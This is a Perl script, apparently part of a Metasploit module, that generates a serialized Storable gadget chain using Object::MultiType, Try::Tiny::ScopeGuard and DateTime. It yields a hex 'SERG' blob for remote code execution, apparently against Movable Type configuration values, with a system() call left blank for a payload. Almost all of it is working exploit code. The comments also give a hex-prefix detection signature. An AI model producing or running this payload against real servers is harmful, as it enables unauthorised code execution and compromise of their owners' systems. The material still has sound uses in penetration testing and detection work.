MetasploitModule#exploit_nondestructive

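#!/usr/bin/perl

# Generate nondestructive config parameter for RCE via Object::MultiType
# and Try::Tiny. The generated value requires minor modification to insert
# the payload inside the system() call and resize the padding.
#
# Output is one hex string: the literal 'SERG' magic, two big-endian 32-bit
# integers (0 and 3), then a Storable::freeze() blob. Because the prefix is
# fixed, the hex form always starts with 53455247 00000000 00000003, which
# is a usable detection signature for this serialized form in logs or
# stored configuration values.

use strict;
use warnings;
use Storable;

# Stub packages: they exist only so that bless() below can name these
# classes inside the frozen blob. No methods are defined here, and the
# overload subs are never invoked by this script (no '+' is applied).
{
    package Object::MultiType;
    # NOTE(review): the overload declaration appears to be what makes
    # Storable::freeze mark refs blessed into this class as overloaded;
    # the frozen blob differs from a plain blessed ref - confirm against
    # the Storable version in use.
    use overload '+' => sub { 'ingored' };
}

{
    package Object::MultiType::Saver;
}

{
    package DateTime;
    use overload '+' => sub { 'ingored' };
}

{
    package Try::Tiny::ScopeGuard;
}

# Object graph that gets serialized: nested blessed refs, nothing else.
# Variable names describe the role each object is meant to play on the
# deserializing side; this script only builds and freezes them.
my $try_tiny_loader   = bless {}, 'DateTime';
my $multitype_saver   = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver';
my $multitype_coderef = bless \$multitype_saver, 'Object::MultiType';

# The second array element is the code string carried in the blob.
# system(q{}) is intentionally empty and the '#' padding length is
# intentionally fixed; both are edited by hand as the header says.
# The \n inside the single-quoted part is a literal backslash-n on
# purpose - it is not expanded by this script.
my $try_tiny_executor = bless [
    $multitype_coderef,
    'MT;print qq{Content-type: text/plain\n\n};system(q{});' . ('#' x 1025) . "\nexit;",
], 'Try::Tiny::ScopeGuard';

my $data   = [$try_tiny_loader, $try_tiny_executor];
my $frozen = 'SERG' . pack('N', 0) . pack('N', 3) . Storable::freeze($data);
$frozen = unpack 'H*', $frozen;    # lowercase hex of the whole byte string
print "RCE payload requiring Object::MultiType and DateTime: $frozen\n";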
